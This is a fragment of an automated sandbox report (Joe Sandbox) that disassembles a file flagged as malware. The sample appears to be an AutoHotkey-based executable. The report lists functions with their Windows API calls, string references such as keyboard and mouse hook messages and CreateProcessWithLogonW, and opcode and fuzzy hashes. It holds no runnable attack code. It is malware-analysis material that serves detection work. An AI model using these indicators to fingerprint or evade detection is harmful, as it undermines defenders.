Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Locale$UpdateUpdate::___getptd
String ID: q[
API String ID: 3914705266-783045719
Opcode ID: 7ec9839e3d6b4f397fcdd61c6e1ff16bbe58ad1447b1f7cd4270eb4313bd2ff8
Instruction ID: 30c833ea68da3aff819ee3fb9fa194c65d4ac4eef682f7c5c5483d7086c82ecf
Opcode Fuzzy Hash: 7ec9839e3d6b4f397fcdd61c6e1ff16bbe58ad1447b1f7cd4270eb4313bd2ff8
Instruction Fuzzy Hash: 6541CB319142456FDB22FB74C44579E7FA1AF02324F5849DEE7905B2D2DB788D81C748

Function 00451FEB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00452040
GetWindowLongA.USER32(?,000000F0), ref: 004520E3

Strings

List, xrefs: 004520C9
Combo, xrefs: 00451FEF

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongParentWindow
String ID: Combo$List
API String ID: 3996284917-1246219895
Opcode ID: 99bcfcaa9a4a00646e2bbe619e1677d97c5bea01097dfec4f4b64bd7bae379b9
Instruction ID: 990ab5c3c43dd2badadc9d75268c5c3ac9bdc14083f02bc5cbe153da75152146
Opcode Fuzzy Hash: 99bcfcaa9a4a00646e2bbe619e1677d97c5bea01097dfec4f4b64bd7bae379b9
Instruction Fuzzy Hash: D721943134430276E61196649D86F7B73589B53F30F10432BFE20E91C2DBDCDD09826A

Function 00442A14 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00442ABF
FindNextFileA.KERNEL32(?,00000010), ref: 00442AE5

Strings

., xrefs: 00442A6D
%s\%s, xrefs: 00442AB9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindNext_sprintf
String ID: %s\%s$.
API String ID: 893695531-2631528844
Opcode ID: 17a09951c0250afc3e0f21746eedbdd1e5d84b14dbc3dcb92acf25c90f6bca70
Instruction ID: a51a5c51598a2e4eb6caac5353f1d1dbe4bb42eb1f855575ed0e1791a4f67d0c
Opcode Fuzzy Hash: 17a09951c0250afc3e0f21746eedbdd1e5d84b14dbc3dcb92acf25c90f6bca70
Instruction Fuzzy Hash: E33128712043415BE320EB24DD44BABB7DAAFC1354F444A2EF89492291DBF9A849C769

Function 00451F1E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 0040EE40: __wcstoi64.LIBCMT ref: 0040EE50

GetWindowLongA.USER32(?,000000F0), ref: 00451F9F
GetParent.USER32 ref: 00452040

Strings

List, xrefs: 00451F85
Combo, xrefs: 00451F51

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongParentWindow__wcstoi64
String ID: Combo$List
API String ID: 3781877300-1246219895
Opcode ID: 15568b2533b756617cc74f12d31147813608fd5e5602d6e86bedf2b167d79d96
Instruction ID: c87bbd4eb7cc118b868bbb735acd3cc206dccac9879a68d82bcac856e50854f0
Opcode Fuzzy Hash: 15568b2533b756617cc74f12d31147813608fd5e5602d6e86bedf2b167d79d96
Instruction Fuzzy Hash: A6216B3124431177E7219620DD86FBB63549B52B20F04462BFE00A91D3D7ECDD4D83AA

Function 00439E6E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00439E80
__fassign.LIBCMT ref: 00439F86
__wcstoi64.LIBCMT ref: 00439FA5

Strings

exe, xrefs: 00439F0C
ico, xrefs: 00439EFA
dll, xrefs: 00439F1E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: RectWindow__fassign__wcstoi64
String ID: dll$exe$ico
API String ID: 3391409961-329004556
Opcode ID: ab02b7fa6b6dadab0f6ccd525be44a6fc83288db7f59139b1ec484d495f1a9e2
Instruction ID: 8a175fa8a78ed19f2cd976ba8f7a0dd46d9bb272df334ef3e062953d2e546952
Opcode Fuzzy Hash: ab02b7fa6b6dadab0f6ccd525be44a6fc83288db7f59139b1ec484d495f1a9e2
Instruction Fuzzy Hash: 9921A0719083418FDB60DF75884169FB6E4AF98714F50991FF8A8D2240E7B8DD05CF9A

Function 004CAA19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

___initmbctable.LIBCMT ref: 004CAA2E

Part of subcall function 004C75F7: __setmbcp.LIBCMT ref: 004C7602

_parse_cmdline.LIBCMT ref: 004CAA70
_parse_cmdline.LIBCMT ref: 004CAAB1

Strings

C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe, xrefs: 004CAA38, 004CAA3D

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _parse_cmdline$___initmbctable__setmbcp
String ID: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe
API String ID: 1290970244-1007669538
Opcode ID: 46025fcb373550c84d9644c37ff9e88c9cd733f6df119d9e354d07ee3dc8ce37
Instruction ID: 28818815f0f3d9262882ca991fe0232c8bdde38e79558db2f0483d65ef4456bd
Opcode Fuzzy Hash: 46025fcb373550c84d9644c37ff9e88c9cd733f6df119d9e354d07ee3dc8ce37
Instruction Fuzzy Hash: 22212B75D0111DBFCB00DFA9AD80D9E7B68EA8132CB14067FF110D3240D2359E61CB9A

Function 0045E430 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045E455

Strings

0, xrefs: 0045E475
AutoHotkeyGUI, xrefs: 0045E52B
40J, xrefs: 0045E47D

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: 0$40J$AutoHotkeyGUI
API String ID: 2102423945-628283360
Opcode ID: 9630e39b9c47f95dafcfe322720d6309703769a66b286687d4161271d49e4b67
Instruction ID: cb63d90cccadbb14bcb80fe3da04a407e23de33d187e190b5fdf76150db436eb
Opcode Fuzzy Hash: 9630e39b9c47f95dafcfe322720d6309703769a66b286687d4161271d49e4b67
Instruction Fuzzy Hash: 0511C170649300AFE724DF11CC46F17BBE4EB89B04F50892EF6445A291D3B8A9488B9E

Function 00450FD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

Strings

RunAs: Missing advapi32.dll., xrefs: 00451003
advapi32, xrefs: 00450FDE
CreateProcessWithLogonW, xrefs: 0045101C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CreateProcessWithLogonW$RunAs: Missing advapi32.dll.$advapi32
API String ID: 0-1948257339
Opcode ID: 8c1397503db2a718e2fc2322f863f5cf2d5ddaa548577dc2e2598e8217444f0c
Instruction ID: 4bf62ec58c58351a42822635aa13ea7f8a7d58d68bb05e09eda5b8a00ace0afc
Opcode Fuzzy Hash: 8c1397503db2a718e2fc2322f863f5cf2d5ddaa548577dc2e2598e8217444f0c
Instruction Fuzzy Hash: FDF078393843846BD720B261AC02FEB224CEB82B84F80003BF98096192EE5D9804836D

Function 0043A245 Relevance: 6.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

DestroyCursor.USER32 ref: 0043A261
DeleteObject.GDI32 ref: 0043A26C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CursorDeleteDestroyObject
String ID:
API String ID: 1476932828-0
Opcode ID: 4e274c7ac84608f0cdebe693617730ace5906fc1c94e46642a81cdd05f36dbc2
Instruction ID: 9ee4be7fbb692f2e35837aa912c5f6b6521fb2efa8682dc4231b219bff62a204
Opcode Fuzzy Hash: 4e274c7ac84608f0cdebe693617730ace5906fc1c94e46642a81cdd05f36dbc2
Instruction Fuzzy Hash: B651B6B26483406BDB10EF698885B6FB7E8BBC8710F44592EF584C3240C779DC148B6B

Function 00487CDA Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00487CE8

Part of subcall function 00487C53: __getptd.LIBCMT ref: 00487C66

__stricmp_l.LIBCMT ref: 00487D55

Part of subcall function 0048C46C: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0048C47B

___crtLCMapStringA.LIBCMT ref: 00487DAB
___crtLCMapStringA.LIBCMT ref: 00487E2C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__stricmp_l
String ID:
API String ID: 178871461-0
Opcode ID: b1d2eb287ba1d7108527eb0c221a0bb410b8cc7a47764cbd111bf6614b89289f
Instruction ID: 224c12587274a3d20acebe0882c7899634229aa11d4b5b9505181781c88d7647
Opcode Fuzzy Hash: b1d2eb287ba1d7108527eb0c221a0bb410b8cc7a47764cbd111bf6614b89289f
Instruction Fuzzy Hash: EE515B308181499BDB25BB64C4A5BBE7BF0AF01328F3849DBE4615B2D2C338CD42D769

Function 00432E97 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,00000048), ref: 00432F33
CreateFontA.GDI32(00000000), ref: 00432F3C
MulDiv.KERNEL32(00000000,?,00000048), ref: 00432F7A
CreateFontA.GDI32(00000000), ref: 00432F83

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateFont
String ID:
API String ID: 1830492434-0
Opcode ID: 16e1aea78eb0025c1cea423b16136f83ab752321925a65cf37e66a4eee36d811
Instruction ID: d5c7a02f45622d4312ec25769eda14df72fb62597f789bb08383c7cff459015d
Opcode Fuzzy Hash: 16e1aea78eb0025c1cea423b16136f83ab752321925a65cf37e66a4eee36d811
Instruction Fuzzy Hash: FE510970649741AFE734CF25CD41F6BB7E5AB88B00F109A1DBA989B3D0D6B4EC408B59

Function 004CE7F4 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004CE828
__isleadbyte_l.LIBCMT ref: 004CE85C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,?), ref: 004CE88D
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004CE8FB

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f2e0dda5de0d6231d2f31035a8f8905680bc2f73ab515ac322e9497143137c4e
Instruction ID: 276998426742e951f3f51f37b8bdd64b61b9390c0da7e304e75c81cd2bb335b4
Opcode Fuzzy Hash: f2e0dda5de0d6231d2f31035a8f8905680bc2f73ab515ac322e9497143137c4e
Instruction Fuzzy Hash: A931F338A00245EFDF60EF66C880FAE3BA0FF01310B1885AEE4549B291D735DD40DB69

Function 004795F0 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0047965E
EnumChildWindows.USER32(?,00479710,?), ref: 0047969C
EnumChildWindows.USER32(?,00479710,?), ref: 004796C6

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ChildEnumWindows$_strncpy
String ID:
API String ID: 2561798602-0
Opcode ID: 6777814d109a177c0dbd693f0fbb13099ffbca6af4b5dc00b13eaae7f63d658c
Instruction ID: 3a5fe69178e475e313c0c04a9a7416da54b5ed02e5417129df8f97900d2bcd19
Opcode Fuzzy Hash: 6777814d109a177c0dbd693f0fbb13099ffbca6af4b5dc00b13eaae7f63d658c
Instruction Fuzzy Hash: 362129711483845BE7309B24DC14BEB77D8AF91704F58CA2FE88C46281EB7E9D08879E

Function 00409330 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0040935F

Strings

AHK Keybd, xrefs: 0040930C
AHK Mouse, xrefs: 0040939B
Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 004093E9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle
String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
API String ID: 2962429428-3816831916
Opcode ID: e949d845df8c0e5a9e6630e6bf3654fe106f80cee4f95d6bada9d7524088f9f2
Instruction ID: da87d6c188d187a8a8e2f5c4398f912ec1b9ce7fe941b0f4c4f1d9b751eec7d9
Opcode Fuzzy Hash: e949d845df8c0e5a9e6630e6bf3654fe106f80cee4f95d6bada9d7524088f9f2
Instruction Fuzzy Hash: F421D170548345E9EB20AB659C4676B3F905B86708F24487FF991762C3C2BC4D89CB5F

Function 00413ED0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00413F11
__wcstoui64.LIBCMT ref: 00413F28
__fassign.LIBCMT ref: 00413F3B
__wcstoui64.LIBCMT ref: 00413F56

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign__wcstoui64
String ID:
API String ID: 1532211443-0
Opcode ID: 93ddf89820171ac7b84a7eb4604e8ee2d5ae94102cdec4a2aa1235a80760fd34
Instruction ID: dccd4ffa75f438cd58d17a5affe39cd8aad7d49b315c21d1674a49e4714c6422
Opcode Fuzzy Hash: 93ddf89820171ac7b84a7eb4604e8ee2d5ae94102cdec4a2aa1235a80760fd34
Instruction Fuzzy Hash: C1113A7295834127DB10AE696C02BDB739C5F91318F44845FF4489B342E76D9E4A43AE

Function 0045048A Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0045049B
CloseHandle.KERNEL32 ref: 004504BC
_memmove.LIBCMT ref: 004504E9
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000104), ref: 004504F5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle$__fassign_memmove
String ID:
API String ID: 1573682697-0
Opcode ID: 9416af5212a5feb028588474ccb98fe5a08b6687dc487c8505f9cac0eb41344e
Instruction ID: 42bf52847b58c5f72eb826097dfdc66bbb13186193a7c4c42cefd36e07ab7842
Opcode Fuzzy Hash: 9416af5212a5feb028588474ccb98fe5a08b6687dc487c8505f9cac0eb41344e
